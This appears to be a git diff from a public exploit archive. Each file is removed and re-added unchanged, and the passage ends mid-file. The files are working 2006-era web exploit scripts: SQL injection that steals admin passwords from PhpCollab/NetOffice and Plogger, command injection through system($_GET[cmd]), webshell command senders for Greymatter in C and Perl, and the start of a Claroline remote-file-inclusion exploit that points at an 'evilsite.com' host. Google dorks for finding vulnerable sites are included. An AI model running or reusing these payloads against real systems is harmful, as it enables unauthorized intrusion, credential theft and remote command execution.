-  http://[target]/[path]/general/login.php?cmd=ls%20-la
-									      */
-error_reporting(0);
-ini_set("max_execution_time",0);
-ini_set("default_socket_timeout",5);
-
-function quick_dump($string)
-{
-  $result='';$exa='';$cont=0;
-  for ($i=0; $i<=strlen($string)-1; $i++)
-  {
-   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
-   {$result.="  .";}
-   else
-   {$result.="  ".$string[$i];}
-   if (strlen(dechex(ord($string[$i])))==2)
-   {$exa.=" ".dechex(ord($string[$i]));}
-   else
-   {$exa.=" 0".dechex(ord($string[$i]));}
-   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
-  }
- return $exa."\r\n".$result;
-}
-$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
-function sendpacketii($packet)
-{
-  global $proxy, $host, $port, $html, $proxy_regex;
-  if ($proxy=='') {
-    $ock=fsockopen(gethostbyname($host),$port);
-    if (!$ock) {
-      echo 'No response from '.$host.':'.$port; die;
-    }
-  }
-  else {
-	$c = preg_match($proxy_regex,$proxy);
-    if (!$c) {
-      echo 'Not a valid proxy...';die;
-    }
-    $parts=explode(':',$proxy);
-    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
-    $ock=fsockopen($parts[0],$parts[1]);
-    if (!$ock) {
-      echo 'No response from proxy...';die;
-	}
-  }
-  fputs($ock,$packet);
-  if ($proxy=='') {
-    $html='';
-    while (!feof($ock)) {
-      $html.=fgets($ock);
-    }
-  }
-  else {
-    $html='';
-    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
-      $html.=fread($ock,1);
-    }
-  }
-  fclose($ock);
-  #debug
-  echo "\r\n".$html;
-}
-
-$host=$argv[1];
-$path=$argv[2];
-$your_email="";
-$port=80;
-$proxy="";
-for ($i=3; $i<=$argc-1; $i++){
-$temp=$argv[$i][0].$argv[$i][1];
-if (($temp<>"-p") and ($temp<>"-P"))
-{$your_email.=" ".$argv[$i];}
-if ($temp=="-p")
-{
-  $port=str_replace("-p","",$argv[$i]);
-}
-if ($temp=="-P")
-{
-  $proxy=str_replace("-P","",$argv[$i]);
-}
-}
-if ($proxy<>'') {$p="http://".$host.":".$port.$path;} else {$p=$path;}
-
-$sql ="'UNION SELECT id,1,CONCAT('this is the real password (encrypted with md5()";
-$sql.=",crypt() or in plain text): ',password),password,name,title,'".$your_email;
-$sql.="',null,'','','','',null,1,'2006-03-27 20:48',0,'administration/admin.php',";
-$sql.="'','',null FROM members mem WHERE id=1/*";
-$sql=urlencode($sql);
-$data="loginForm=".$sql;
-$packet ="POST ".$p."general/sendpassword.php?action=send HTTP/1.0\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
-$packet.="Content-Length: ".strlen($data)."\r\n";
-$packet.="Connection: Close\r\n\r\n";
-$packet.=$data;
-#debug
-echo quick_dump($packet);
-sendpacketii($packet);
-echo "Now check your mailbox...";
-?>
-
-# milw0rm.com [2006-03-28]
+#!/usr/bin/php -q -d short_open_tag=on
+ works with magic_quotes_gpc = Off\r\n\r\n";
+echo "a googledork: intitle:phpcollab|netoffice \"index of\" -www-apps -php-collab.org -ext:xml\r\n\r\n";
+if ($argc<4) {
+echo "Usage: php ".$argv[0]." host path email OPTIONS\r\n";
+echo "host:      target server (ip/hostname)\r\n";
+echo "path:      path to NetOffice or PHPCollab\r\n";
+echo "email:     your email\r\n";
+echo "Options:\r\n";
+echo "   -p[port]:    specify a port other than 80\r\n";
+echo "   -P[ip:port]: specify a proxy\r\n";
+echo "Examples:\r\n";
+echo "php ".$argv[0]." localhost /NetOffice/ youremail@somehost.com\n";
+echo "php ".$argv[0]." localhost /PhpCollab/ youremail@somehost.com -p81\r\n";
+echo "php ".$argv[0]." localhost / youremail@somehost.com -P1.1.1.1:80\r\n";
+die;
+}
+
+/* explaination:
+
+   tested & working against: PhpCollab v2.4
+			     PhpCollab v2.5 rc3
+	                     NetOffice v2.5.3-pl1
+	                     NetOffice v2.6.0b2
+   vulnerability;
+
+   SQL injection in "forgotten password" feature:
+   if magic_quotes_gpc=Off you can send yourself the admin (md5(), crypt() or
+   plain text) password, poc:
+   you can submit a "loginForm" POST value like this to general/sendpassword.php
+   script :
+
+  'UNION SELECT id,1,CONCAT('this is the real password (encrypted with md5(),
+  crypt() or in plain text): ',password),password,name,title,'[your email here]'
+  ,null,'','','','',null,1,'2006-03-27 20:48',0,'administration/admin.php','',''
+  ,null FROM members mem WHERE id=1/*
+
+  query becomes:
+   SELECT mem.*, org.name, log.connected FROM members mem LEFT OUTER JOIN
+   organizations org ON org.id = mem.organization LEFT OUTER JOIN logs log ON
+   log.login = mem.login  WHERE mem.login = ''UNION SELECT id,1,CONCAT('this is
+   the real password (encrypted with md5(),crypt() or in plain text): ',password
+   ),password,name,title,'[your email]',null,'','','','',null,1,'2006-03-27 20:
+   48',0,'administration/admin.php','','',null FROM members mem WHERE id=1/*'
+
+  you will receive soon a mail like this:
+
+  Username : this is the real password (encrypted with md5(),crypt() or in plain text): [password]
+  password : [random generated password]
+
+  ignore password field, password is not changed, 'cause the UPDATE query fails,
+  but the real one is showed in Username mail field.
+
+  once you are admin, you can inject arbitrary code in settings.php
+  (you know, magic_quotes_gpc is off), poc:
+  login, go to "Edit settings" feature, in FTP SERVER field type:
+
+  '); system($_GET[cmd]); print ('
+
+  in settings.php, near line 38, you have:
+
+  ...
+  define('FTPSERVER',''); system($_GET[cmd]); print ('');
+  ...
+
+  so you can launch commands, ex:
+
+  http://[target]/[path]/general/login.php?cmd=ls%20-la
+									      */
+error_reporting(0);
+ini_set("max_execution_time",0);
+ini_set("default_socket_timeout",5);
+
+function quick_dump($string)
+{
+  $result='';$exa='';$cont=0;
+  for ($i=0; $i<=strlen($string)-1; $i++)
+  {
+   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
+   {$result.="  .";}
+   else
+   {$result.="  ".$string[$i];}
+   if (strlen(dechex(ord($string[$i])))==2)
+   {$exa.=" ".dechex(ord($string[$i]));}
+   else
+   {$exa.=" 0".dechex(ord($string[$i]));}
+   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
+  }
+ return $exa."\r\n".$result;
+}
+$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
+function sendpacketii($packet)
+{
+  global $proxy, $host, $port, $html, $proxy_regex;
+  if ($proxy=='') {
+    $ock=fsockopen(gethostbyname($host),$port);
+    if (!$ock) {
+      echo 'No response from '.$host.':'.$port; die;
+    }
+  }
+  else {
+	$c = preg_match($proxy_regex,$proxy);
+    if (!$c) {
+      echo 'Not a valid proxy...';die;
+    }
+    $parts=explode(':',$proxy);
+    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
+    $ock=fsockopen($parts[0],$parts[1]);
+    if (!$ock) {
+      echo 'No response from proxy...';die;
+	}
+  }
+  fputs($ock,$packet);
+  if ($proxy=='') {
+    $html='';
+    while (!feof($ock)) {
+      $html.=fgets($ock);
+    }
+  }
+  else {
+    $html='';
+    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
+      $html.=fread($ock,1);
+    }
+  }
+  fclose($ock);
+  #debug
+  echo "\r\n".$html;
+}
+
+$host=$argv[1];
+$path=$argv[2];
+$your_email="";
+$port=80;
+$proxy="";
+for ($i=3; $i<=$argc-1; $i++){
+$temp=$argv[$i][0].$argv[$i][1];
+if (($temp<>"-p") and ($temp<>"-P"))
+{$your_email.=" ".$argv[$i];}
+if ($temp=="-p")
+{
+  $port=str_replace("-p","",$argv[$i]);
+}
+if ($temp=="-P")
+{
+  $proxy=str_replace("-P","",$argv[$i]);
+}
+}
+if ($proxy<>'') {$p="http://".$host.":".$port.$path;} else {$p=$path;}
+
+$sql ="'UNION SELECT id,1,CONCAT('this is the real password (encrypted with md5()";
+$sql.=",crypt() or in plain text): ',password),password,name,title,'".$your_email;
+$sql.="',null,'','','','',null,1,'2006-03-27 20:48',0,'administration/admin.php',";
+$sql.="'','',null FROM members mem WHERE id=1/*";
+$sql=urlencode($sql);
+$data="loginForm=".$sql;
+$packet ="POST ".$p."general/sendpassword.php?action=send HTTP/1.0\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
+$packet.="Content-Length: ".strlen($data)."\r\n";
+$packet.="Connection: Close\r\n\r\n";
+$packet.=$data;
+#debug
+echo quick_dump($packet);
+sendpacketii($packet);
+echo "Now check your mailbox...";
+?>
+
+# milw0rm.com [2006-03-28]
diff --git a/platforms/php/webapps/1618.c b/platforms/php/webapps/1618.c
index b92a1f098..bf21484a0 100755
--- a/platforms/php/webapps/1618.c
+++ b/platforms/php/webapps/1618.c
@@ -1,99 +1,99 @@
-#include 
-#include 
-#include 
-#define RETCONNERR            4                        // Connection error
-#define RETSOCKERR            3                        // Return for socket error
-#define RETRESVERR            2                        // Error code for cannot resolve host
-#define RETOK                 1                        // Return OK
-#pragma comment(lib,"wsock32")
-#define portnum 80
-int info(char *ls1);
-int ConnectWithString(char *hostname,char *string);
-int main(int argc,char **argv){
-    char buff[512]="";
-    char get[1024]="";
-    if(argc<3)
-        {
-            info(argv[0]);
-            return 0;
-        }
-    strcpy(buff,argv[2]);
-    strcat(buff,"?cmd=");
-    strcat(buff,argv[3]);
-    strcpy(get,"GET ");
-    strcat(get,buff);
-    strcat(get," HTTP/1.1");
-    printf("%s\n",get);
-    ConnectWithString(argv[1],get);
-    return 0;
-}
-int ConnectWithString(char *hostname,char *string)
-{
-    // Socket handle
-    WSADATA wsda;
-
-    // Socket file descriptor
-    int sockfd;
-
-    // host entrie
-    struct hostent *h;
-
-    // Server struct
-    struct sockaddr_in server;
-
-    // Return value
-    int ret;
-
-    // Initialize socket
-    WSAStartup(0x0101, &wsda);
-
-    // Open a socket
-    // Create tcp socket
-        if((sockfd=socket(AF_INET,SOCK_STREAM,0))==-1)
-            return RETSOCKERR;
-
-    // Cannot create socket if anything fails
-    else
-        return RETSOCKERR;
-
-    // Resolve host
-    if((h=gethostbyname(hostname)) == NULL)
-            return RETRESVERR;
-
-    // Init server struct
-    server.sin_addr=*((struct in_addr*)h->h_addr);
-    server.sin_port=htons(portnum);
-    server.sin_family=AF_INET;
-
-    // Connect with server
-    if(connect(sockfd, (struct sockaddr*)&server, sizeof(struct sockaddr)) == -1)
-        return RETCONNERR;
-
-    // Send string
-    ret = send(sockfd, string, strlen(string), 0);
-
-    // Check for socket error
-    if(ret == SOCKET_ERROR)
-        return RETSOCKERR;
-
-    // Cleanup socket
-    WSACleanup();
-
-    closesocket(sockfd);
-
-    // Everything OK
-
-    return RETOK;
-}
-int info(char *ls1){
-    printf("******************************************************************\n");
-    printf("*          GREYMATTER Exploit  private version                   *\n");
-    printf("*         Exploit By:No_Face_King Bug By:syst3m_f4ult            *\n");
-    printf("*    www.crouz.com Great iranian security team                   *\n");
-    printf("*      Usage: %s VictimIP  GREYMATTER Path  command  *\n",ls1);
-    printf("*   e.g: %s 192.168.0.1  /00000008.php  uname -a     *\n",ls1);
-    printf("******************************************************************\n");
-    return 0;
-}
-
-// milw0rm.com [2006-03-28]
+#include 
+#include 
+#include 
+#define RETCONNERR            4                        // Connection error
+#define RETSOCKERR            3                        // Return for socket error
+#define RETRESVERR            2                        // Error code for cannot resolve host
+#define RETOK                 1                        // Return OK
+#pragma comment(lib,"wsock32")
+#define portnum 80
+int info(char *ls1);
+int ConnectWithString(char *hostname,char *string);
+int main(int argc,char **argv){
+    char buff[512]="";
+    char get[1024]="";
+    if(argc<3)
+        {
+            info(argv[0]);
+            return 0;
+        }
+    strcpy(buff,argv[2]);
+    strcat(buff,"?cmd=");
+    strcat(buff,argv[3]);
+    strcpy(get,"GET ");
+    strcat(get,buff);
+    strcat(get," HTTP/1.1");
+    printf("%s\n",get);
+    ConnectWithString(argv[1],get);
+    return 0;
+}
+int ConnectWithString(char *hostname,char *string)
+{
+    // Socket handle
+    WSADATA wsda;
+
+    // Socket file descriptor
+    int sockfd;
+
+    // host entrie
+    struct hostent *h;
+
+    // Server struct
+    struct sockaddr_in server;
+
+    // Return value
+    int ret;
+
+    // Initialize socket
+    WSAStartup(0x0101, &wsda);
+
+    // Open a socket
+    // Create tcp socket
+        if((sockfd=socket(AF_INET,SOCK_STREAM,0))==-1)
+            return RETSOCKERR;
+
+    // Cannot create socket if anything fails
+    else
+        return RETSOCKERR;
+
+    // Resolve host
+    if((h=gethostbyname(hostname)) == NULL)
+            return RETRESVERR;
+
+    // Init server struct
+    server.sin_addr=*((struct in_addr*)h->h_addr);
+    server.sin_port=htons(portnum);
+    server.sin_family=AF_INET;
+
+    // Connect with server
+    if(connect(sockfd, (struct sockaddr*)&server, sizeof(struct sockaddr)) == -1)
+        return RETCONNERR;
+
+    // Send string
+    ret = send(sockfd, string, strlen(string), 0);
+
+    // Check for socket error
+    if(ret == SOCKET_ERROR)
+        return RETSOCKERR;
+
+    // Cleanup socket
+    WSACleanup();
+
+    closesocket(sockfd);
+
+    // Everything OK
+
+    return RETOK;
+}
+int info(char *ls1){
+    printf("******************************************************************\n");
+    printf("*          GREYMATTER Exploit  private version                   *\n");
+    printf("*         Exploit By:No_Face_King Bug By:syst3m_f4ult            *\n");
+    printf("*    www.crouz.com Great iranian security team                   *\n");
+    printf("*      Usage: %s VictimIP  GREYMATTER Path  command  *\n",ls1);
+    printf("*   e.g: %s 192.168.0.1  /00000008.php  uname -a     *\n",ls1);
+    printf("******************************************************************\n");
+    return 0;
+}
+
+// milw0rm.com [2006-03-28]
diff --git a/platforms/php/webapps/1619.pl b/platforms/php/webapps/1619.pl
index 02cbbaac5..64bbf1d27 100755
--- a/platforms/php/webapps/1619.pl
+++ b/platforms/php/webapps/1619.pl
@@ -1,46 +1,46 @@
-#!/usr/bin/perl
-#
-# Exploit by Hessam-x (www.hessamx.net)
-# Special Thanx : Vampire , s3rv3r_hack3r
-######################################################
-#  ___ ___                __                         #
-# /   |   \_____    ____ |  | __ ___________________ #
-#/    ~    \__  \ _/ ___\|  |/ // __ \_  __ \___   / #
-#\    Y    // __ \\  \___|    <\  ___/|  | \//    /  #
-# \___|_  /(____  )\___  >__|_ \\___  >__|  /_____ \ #
-#       \/      \/     \/     \/    \/            \/ #
-#             Iran Hackerz Security Team             #
-#               WebSite: www.hackerz.ir              #
-#                 DeltaHAcking Team                  #
-#           website: www.deltahacking.com            #
-######################################################
-# Name    : Greymatter                               #
-# Site    : http://www.noahgrey.com/greysoft/        #
-######################################################
-# example:
-# target : www.yesite.com/Greymatter/
-# archive number : 00000141
-use LWP::Simple;
-
-
-print "-------------------------------------------\n";
-print "=                 Greymatter              =\n";
-print "=       By Hessam-x  - www.hackerz.ir     =\n";
-print "=   Vampire      - www.deltahacking.com   =\n"; 
-print "-------------------------------------------\n\n";
-
-
-      print "Target >http://";
-      chomp($targ = );
-      print "archive number >";
-      chomp($arnum= );
-   
-   $con=get("http://".$targ) || die "[-]Cannot connect to Host"; 
-while ()  
-{  
-     print "Hessam-x@Greymatter \$";
-     chomp($comd=);
-     $commd=get("http://".$targ."archives/".$arnum.".php?cmd=".comd)
-}
-
-# milw0rm.com [2006-03-28]
+#!/usr/bin/perl
+#
+# Exploit by Hessam-x (www.hessamx.net)
+# Special Thanx : Vampire , s3rv3r_hack3r
+######################################################
+#  ___ ___                __                         #
+# /   |   \_____    ____ |  | __ ___________________ #
+#/    ~    \__  \ _/ ___\|  |/ // __ \_  __ \___   / #
+#\    Y    // __ \\  \___|    <\  ___/|  | \//    /  #
+# \___|_  /(____  )\___  >__|_ \\___  >__|  /_____ \ #
+#       \/      \/     \/     \/    \/            \/ #
+#             Iran Hackerz Security Team             #
+#               WebSite: www.hackerz.ir              #
+#                 DeltaHAcking Team                  #
+#           website: www.deltahacking.com            #
+######################################################
+# Name    : Greymatter                               #
+# Site    : http://www.noahgrey.com/greysoft/        #
+######################################################
+# example:
+# target : www.yesite.com/Greymatter/
+# archive number : 00000141
+use LWP::Simple;
+
+
+print "-------------------------------------------\n";
+print "=                 Greymatter              =\n";
+print "=       By Hessam-x  - www.hackerz.ir     =\n";
+print "=   Vampire      - www.deltahacking.com   =\n"; 
+print "-------------------------------------------\n\n";
+
+
+      print "Target >http://";
+      chomp($targ = );
+      print "archive number >";
+      chomp($arnum= );
+   
+   $con=get("http://".$targ) || die "[-]Cannot connect to Host"; 
+while ()  
+{  
+     print "Hessam-x@Greymatter \$";
+     chomp($comd=);
+     $commd=get("http://".$targ."archives/".$arnum.".php?cmd=".comd)
+}
+
+# milw0rm.com [2006-03-28]
diff --git a/platforms/php/webapps/1621.php b/platforms/php/webapps/1621.php
index d0adb70dc..d08fa8213 100755
--- a/platforms/php/webapps/1621.php
+++ b/platforms/php/webapps/1621.php
@@ -1,165 +1,165 @@
-#!/usr/bin/php -q -d short_open_tag=on
- works with magic_quotes_gpc = Off\r\n\r\n";
-echo "dork: intext:\"Powered by Plogger!\" -plogger.org\r\n\r\n";
-
-if ($argc<3) {
-echo "Usage: php ".$argv[0]." host path OPTIONS\r\n";
-echo "host:      target server (ip/hostname)\r\n";
-echo "path:      path to plogger\r\n";
-echo "Options:\r\n";
-echo "   -p[port]:    specify a port other than 80\r\n";
-echo "   -P[ip:port]: specify a proxy\r\n";
-echo "Examples:\r\n";
-echo "php ".$argv[0]." localhost /plogger/\r\n";
-echo "php ".$argv[0]." localhost /plogger/ -p81\r\n";
-echo "php ".$argv[0]." localhost / -P1.1.1.1:80\r\n";
-die;
-}
-
-/*
-  explaination:
-
-  software site: http://www.plogger.org/
-  description: "Plogger: The definitive open-source web photo gallery - Plogger
-  is a free online photo gallery generation script with automatic thumbnail
-  creation, easy installation, and RSS feeds."
-
-  vulnerable code in gallery.php near lines 37-38:
-
-  ...
-  if ($_GET["level"] == "slideshow")
-	$inHead .= generate_slideshow_js($_GET["id"], "album");
-  ...
-
-  "id" GET argument is not properly sanitized before to be passed to
-   generate_slideshow_js() func, so, if magic_quotes_gpc = Off, sql injection,
-   poc :
-
-  http://[target]/[path]/index.php?level=slideshow&mode=album&id='UNION SELECT
-  CONCAT('*USERNAME*:',admin_username,'***'),2,3,CONCAT('*HASH*:',admin_password
-  ,'***'),5,6,7,8,9,10,11,12,13,14 FROM plogger_config/*
-
-  query becomes:
-
-  SELECT * FROM plogger_pictures WHERE parent_album = ''UNION SELECT
-  CONCAT('*USERNAME*',admin_username,'***'),2,3,CONCAT('*HASH*',admin_password,
-  '***'),5,6,7,8,9,10,11,12,13,14 FROM plogger_config/*' ORDER BY
-  `date_submitted`
-
-  now, at screen, you have admin credentials                                  */
-
-error_reporting(0);
-ini_set("max_execution_time",0);
-ini_set("default_socket_timeout",5);
-
-function quick_dump($string)
-{
-  $result='';$exa='';$cont=0;
-  for ($i=0; $i<=strlen($string)-1; $i++)
-  {
-   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
-   {$result.="  .";}
-   else
-   {$result.="  ".$string[$i];}
-   if (strlen(dechex(ord($string[$i])))==2)
-   {$exa.=" ".dechex(ord($string[$i]));}
-   else
-   {$exa.=" 0".dechex(ord($string[$i]));}
-   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
-  }
- return $exa."\r\n".$result;
-}
-$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
-function sendpacketii($packet)
-{
-  global $proxy, $host, $port, $html, $proxy_regex;
-  if ($proxy=='') {
-    $ock=fsockopen(gethostbyname($host),$port);
-    if (!$ock) {
-      echo 'No response from '.$host.':'.$port; die;
-    }
-  }
-  else {
-	$c = preg_match($proxy_regex,$proxy);
-    if (!$c) {
-      echo 'Not a valid proxy...';die;
-    }
-    $parts=explode(':',$proxy);
-    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
-    $ock=fsockopen($parts[0],$parts[1]);
-    if (!$ock) {
-      echo 'No response from proxy...';die;
-	}
-  }
-  fputs($ock,$packet);
-  if ($proxy=='') {
-    $html='';
-    while (!feof($ock)) {
-      $html.=fgets($ock);
-    }
-  }
-  else {
-    $html='';
-    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
-      $html.=fread($ock,1);
-    }
-  }
-  fclose($ock);
-  #debug
-  #echo "\r\n".$html;
-}
-
-$host=$argv[1];
-$path=$argv[2];
-if (($path[0]<>'/') | ($path[strlen($path)-1]<>'/'))
-{die("Check the path, it must begin and end with a trailing slash\r\n");}
-$port=80;
-$proxy="";
-if ($argv[3]<>'')
-{
-for ($i=3; $i<=$argc-1; $i++){
-$temp=$argv[$i][0].$argv[$i][1];
-if (($temp<>"-p") and ($temp<>"-P"))
-if ($temp=="-p")
-{
-  $port=str_replace("-p","",$argv[$i]);
-}
-if ($temp=="-P")
-{
-  $proxy=str_replace("-P","",$argv[$i]);
-}
-}
-}
-if ($proxy<>'') {$p="http://".$host.":".$port.$path;} else {$p=$path;}
-
-$sql ="'UNION SELECT CONCAT('*USERNAME*',admin_username,'***'),2,3,CONCAT('*HASH*'";
-$sql.=",admin_password,'***'),5,6,7,8,9,10,11,12,13,14 FROM plogger_config/*";
-$sql=urlencode($sql);
-$packet ="GET ".$p."index.php?level=slideshow&mode=album&id=".$sql." HTTP/1.0\r\n";
-$packet.="User-Agent: Googlebot/2.1\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Connection: Close\r\n\r\n";
-#debug
-#echo quick_dump($packet);
-sendpacketii($packet);
-if (strstr($html,"*HASH*"))
-{
- echo "Exploit succeeded...\r\n";
- $temp=explode("*USERNAME*",$html);
- $temp2=explode("***",$temp[1]);
- $admin_name=$temp2[0];
- echo "Admin name -> ".$admin_name."\r\n";
- $temp=explode("*HASH*",$html);
- $temp2=explode("***",$temp[1]);
- $admin_password=$temp2[0];
- echo "Admin password hash -> ".$admin_password."\r\n";
-}
-else
-{echo "Exploit failed... magic quotes on here or Plogger patched \r\n";}
-?>
-
-# milw0rm.com [2006-03-28]
+#!/usr/bin/php -q -d short_open_tag=on
+ works with magic_quotes_gpc = Off\r\n\r\n";
+echo "dork: intext:\"Powered by Plogger!\" -plogger.org\r\n\r\n";
+
+if ($argc<3) {
+echo "Usage: php ".$argv[0]." host path OPTIONS\r\n";
+echo "host:      target server (ip/hostname)\r\n";
+echo "path:      path to plogger\r\n";
+echo "Options:\r\n";
+echo "   -p[port]:    specify a port other than 80\r\n";
+echo "   -P[ip:port]: specify a proxy\r\n";
+echo "Examples:\r\n";
+echo "php ".$argv[0]." localhost /plogger/\r\n";
+echo "php ".$argv[0]." localhost /plogger/ -p81\r\n";
+echo "php ".$argv[0]." localhost / -P1.1.1.1:80\r\n";
+die;
+}
+
+/*
+  explaination:
+
+  software site: http://www.plogger.org/
+  description: "Plogger: The definitive open-source web photo gallery - Plogger
+  is a free online photo gallery generation script with automatic thumbnail
+  creation, easy installation, and RSS feeds."
+
+  vulnerable code in gallery.php near lines 37-38:
+
+  ...
+  if ($_GET["level"] == "slideshow")
+	$inHead .= generate_slideshow_js($_GET["id"], "album");
+  ...
+
+  "id" GET argument is not properly sanitized before to be passed to
+   generate_slideshow_js() func, so, if magic_quotes_gpc = Off, sql injection,
+   poc :
+
+  http://[target]/[path]/index.php?level=slideshow&mode=album&id='UNION SELECT
+  CONCAT('*USERNAME*:',admin_username,'***'),2,3,CONCAT('*HASH*:',admin_password
+  ,'***'),5,6,7,8,9,10,11,12,13,14 FROM plogger_config/*
+
+  query becomes:
+
+  SELECT * FROM plogger_pictures WHERE parent_album = ''UNION SELECT
+  CONCAT('*USERNAME*',admin_username,'***'),2,3,CONCAT('*HASH*',admin_password,
+  '***'),5,6,7,8,9,10,11,12,13,14 FROM plogger_config/*' ORDER BY
+  `date_submitted`
+
+  now, at screen, you have admin credentials                                  */
+
+error_reporting(0);
+ini_set("max_execution_time",0);
+ini_set("default_socket_timeout",5);
+
+function quick_dump($string)
+{
+  $result='';$exa='';$cont=0;
+  for ($i=0; $i<=strlen($string)-1; $i++)
+  {
+   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
+   {$result.="  .";}
+   else
+   {$result.="  ".$string[$i];}
+   if (strlen(dechex(ord($string[$i])))==2)
+   {$exa.=" ".dechex(ord($string[$i]));}
+   else
+   {$exa.=" 0".dechex(ord($string[$i]));}
+   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
+  }
+ return $exa."\r\n".$result;
+}
+$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
+function sendpacketii($packet)
+{
+  global $proxy, $host, $port, $html, $proxy_regex;
+  if ($proxy=='') {
+    $ock=fsockopen(gethostbyname($host),$port);
+    if (!$ock) {
+      echo 'No response from '.$host.':'.$port; die;
+    }
+  }
+  else {
+	$c = preg_match($proxy_regex,$proxy);
+    if (!$c) {
+      echo 'Not a valid proxy...';die;
+    }
+    $parts=explode(':',$proxy);
+    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
+    $ock=fsockopen($parts[0],$parts[1]);
+    if (!$ock) {
+      echo 'No response from proxy...';die;
+	}
+  }
+  fputs($ock,$packet);
+  if ($proxy=='') {
+    $html='';
+    while (!feof($ock)) {
+      $html.=fgets($ock);
+    }
+  }
+  else {
+    $html='';
+    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
+      $html.=fread($ock,1);
+    }
+  }
+  fclose($ock);
+  #debug
+  #echo "\r\n".$html;
+}
+
+$host=$argv[1];
+$path=$argv[2];
+if (($path[0]<>'/') | ($path[strlen($path)-1]<>'/'))
+{die("Check the path, it must begin and end with a trailing slash\r\n");}
+$port=80;
+$proxy="";
+if ($argv[3]<>'')
+{
+for ($i=3; $i<=$argc-1; $i++){
+$temp=$argv[$i][0].$argv[$i][1];
+if (($temp<>"-p") and ($temp<>"-P"))
+if ($temp=="-p")
+{
+  $port=str_replace("-p","",$argv[$i]);
+}
+if ($temp=="-P")
+{
+  $proxy=str_replace("-P","",$argv[$i]);
+}
+}
+}
+if ($proxy<>'') {$p="http://".$host.":".$port.$path;} else {$p=$path;}
+
+$sql ="'UNION SELECT CONCAT('*USERNAME*',admin_username,'***'),2,3,CONCAT('*HASH*'";
+$sql.=",admin_password,'***'),5,6,7,8,9,10,11,12,13,14 FROM plogger_config/*";
+$sql=urlencode($sql);
+$packet ="GET ".$p."index.php?level=slideshow&mode=album&id=".$sql." HTTP/1.0\r\n";
+$packet.="User-Agent: Googlebot/2.1\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Connection: Close\r\n\r\n";
+#debug
+#echo quick_dump($packet);
+sendpacketii($packet);
+if (strstr($html,"*HASH*"))
+{
+ echo "Exploit succeeded...\r\n";
+ $temp=explode("*USERNAME*",$html);
+ $temp2=explode("***",$temp[1]);
+ $admin_name=$temp2[0];
+ echo "Admin name -> ".$admin_name."\r\n";
+ $temp=explode("*HASH*",$html);
+ $temp2=explode("***",$temp[1]);
+ $admin_password=$temp2[0];
+ echo "Admin password hash -> ".$admin_password."\r\n";
+}
+else
+{echo "Exploit failed... magic quotes on here or Plogger patched \r\n";}
+?>
+
+# milw0rm.com [2006-03-28]
diff --git a/platforms/php/webapps/1627.php b/platforms/php/webapps/1627.php
index 64f89ec72..1506a5db3 100755
--- a/platforms/php/webapps/1627.php
+++ b/platforms/php/webapps/1627.php
@@ -1,174 +1,174 @@
-#!/usr/bin/php -q -d short_open_tag=on
- works with register_globals = On & allow_url_fopen = On\r\n\r\n";
-echo "dork: \"Powered by Claroline\" -demo\r\n\r\n";
-
-if ($argc<5) {
-echo "Usage: php ".$argv[0]." host path location OPTIONS\r\n";
-echo "host:      target server (ip/hostname)\r\n";
-echo "path:      path to claroline\r\n";
-echo "location:  arbitrary location with the code to include\r\n";
-echo "Options:\r\n";
-echo "   -p[port]:    specify a port other than 80\r\n";
-echo "   -P[ip:port]: specify a proxy\r\n";
-echo "Examples:\r\n";
-echo "php ".$argv[0]." target.com /claroline174/ http://evilsite.com ls -la\r\n";
-echo "php ".$argv[0]." target.com /claroline174/ http://evilsite.com cat ./..\r\n";
-echo "/../inc/conf/claro_main.conf.php -p81\r\n";
-echo "php ".$argv[0]." target.com / http://evilsite.com uname -a -P1.1.1.1:80\r\n\r\n";
-echo "note, on remote location you need a\r\n";
-echo "/lib/fileUpload.lib.php/index.html\r\n";
-echo "or a\r\n";
-echo "/lib/pclzip/pclzip.lib.php/index.html\r\n";
-echo "with this code inside:\r\n\r\n";
-echo "'."\r\n";
-die;
-}
-
-/*
-  explaination:
-  software site: http://www.claroline.net/
-  description:   Claroline is a free application based on PHP/MySQL allowing
-                 teachers or education organizations to create and administrate
-	         courses through the web.
-
-  vulnerabilities:
-
-  i) system disclosure:
-  without to have an account you can see (not modify or include) all files on target system
-  regardless of any php.ini settings, ex:
-
-  http://[target]/[path_to_claroline]/claroline/document/rqmkhtml.php?cmd=rqEditHtml&file=/../../../../apache/logs/error.log
-  http://[target]/[path_to_claroline]/claroline/document/rqmkhtml.php?cmd=rqEditHtml&file=/../../claroline/inc/conf/claro_main.conf.php
-  (see inside html for this)
-
-  ii)  xss & full path disclosure:
-  http://[target]/[path_to_claroline]/claroline/document/rqmkhtml.php?cmd=rqEditHtml&file=">
-
-  iii) and finally, arbitrary remote inclusion / remote commands execution:
-
